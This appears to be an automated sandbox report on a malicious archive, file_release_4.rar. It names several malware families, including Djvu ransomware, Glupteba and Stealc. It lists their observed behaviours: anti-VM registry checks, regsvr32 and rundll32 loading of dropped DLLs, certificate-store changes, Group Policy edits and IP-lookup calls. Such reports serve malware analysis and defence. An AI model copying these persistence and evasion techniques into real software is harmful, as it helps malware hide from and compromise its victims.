Analysis Overview
SHA256
e3683f1a58054c1166a94d5758848ed053777c7dc575a7af69c938b39f204eb5
Threat Level: Known bad
The file file_release_4.rar was found to be: Known bad.
Malicious Activity Summary
Detected Djvu ransomware
ZGRat
Glupteba payload
Detect ZGRat V1
Lumma Stealer
Djvu Ransomware
SmokeLoader
RisePro
Stealc
Glupteba
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Modifies Windows Firewall
Modifies file permissions
Identifies Wine through registry keys
Unexpected DNS network traffic destination
Reads data files stored by FTP clients
Drops startup file
Executes dropped EXE
Checks computer location settings
UPX packed file
Loads dropped DLL
Checks BIOS information in registry
Themida packer
Reads user/profile data of web browsers
Drops Chrome extension
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Suspicious use of SetThreadContext
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Checks processor information in registry
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-23 17:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win7-20240220-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2860 wrote to memory of 2280 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2860 wrote to memory of 2280 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2860 wrote to memory of 2280 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2860 wrote to memory of 2280 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2860 wrote to memory of 2280 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2860 wrote to memory of 2280 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2860 wrote to memory of 2280 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win10v2004-20240221-en
Max time kernel
148s
Max time network
156s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 212 wrote to memory of 2352 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 212 wrote to memory of 2352 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 212 wrote to memory of 2352 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2352 -ip 2352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 600
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:49
Platform
win7-20240221-en
Max time kernel
31s
Max time network
162s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
